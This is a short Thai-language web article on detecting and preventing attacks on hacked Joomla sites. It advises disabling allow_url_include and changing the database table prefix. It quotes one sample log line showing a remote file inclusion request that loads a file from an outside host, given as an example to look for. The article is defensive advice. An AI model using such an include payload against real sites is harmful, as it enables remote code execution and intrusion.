ทำอย่างไรเมื่อ joomla ถูก Hack!Joomla |
|||
by Bigquery.com ![]() ![]() | |||
ถ้าหากเว็บไซต์ joomla ของคุณถูก Hack สิ่งแรกที่คุณต้องตรวจสอบคือ weblogs หา client requests ที่น่าส่งสัย เช่น: 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] \\\"GET /index.php?live_site=test.org/1.txt?? HTTP/1.1\\\" 200 10864 \\\"-\\\" \\\"Firefox\\\" แต่ก็ไม่ใช่เรื่องง่ายที่จะทำการหาต้นตอของการโจมตีเว็บไซต์ joomla ของเรา ซึ่งอาจจะต้องใช้เวลานานในการค้นหาต้นตอดังกล่าว ดังนั้นสิ่งที่นักพัฒนาเว็บไซต์ด้วย Joomla ควรจะต้องรู้คือช่องโหว่ในการโจมตีเว็บไซต์ joomla ของเรา
- allow_url_includeการตั้งค่า allow_url_include ใน PHP's configuration - หากตั้งค่าเป็น on เป็นการเปิดทางให้ Hacker remote code เข้ามาใน ดังนั้นควรตรวจสอบให้แน่ใจว่าตั้งค่าของ allow_url_include เป็น off อยู่เสมอ - การใช้คำนำหน้าของตาราง _jos. นี้ก็เป็นอีกช่องทางหนึ่งที่เปิดให้ Hacker ใช้เจาะฐานข้อมูลเราได้ในรูปแบบ MySQL injections สิ่งที่ควรทำคือเปลี่ยน prefix หรือคำนำหน้าของตารางให้ยากต่อการคาดเดา หรืออาจจะใช้ component joomla นี้ ตามลิ้งค์ต่อท้าย this component; |
|||
|
|||
| My Joomla has been hacked! | |||
![]() | |||
| ***หากบทความนี้เป็นประโยชน์ต่อท่านหรือไม่อย่างไร.. ช่วยให้คะแนนด้านบนด้วยครับ จักขอบคุณยิ่ง*** | |||
| Back | |||
บทความเกี่ยวกับ Joomla
- Joomla! 3.0 แล้วจ้า Mobile Ready / User Friendly [views : 473 ]
- Download Joomla! 1.5.x [views : 14819 ]
- ลืม password administrator ใน joomla ทำอย่างไร? [views : 5751 ]
- ทำอย่างไรเมื่อ joomla ถูก Hack! [views : 3290 ]
- joomla template [views : 2780 ]
- Free templates joomla download [views : 37523 ]
- Free templates mambo download [views : 12454 ]
- ติดตั้ง Joomla [views : 1850 ]
- บทความเกี่ยวกับ Joomla












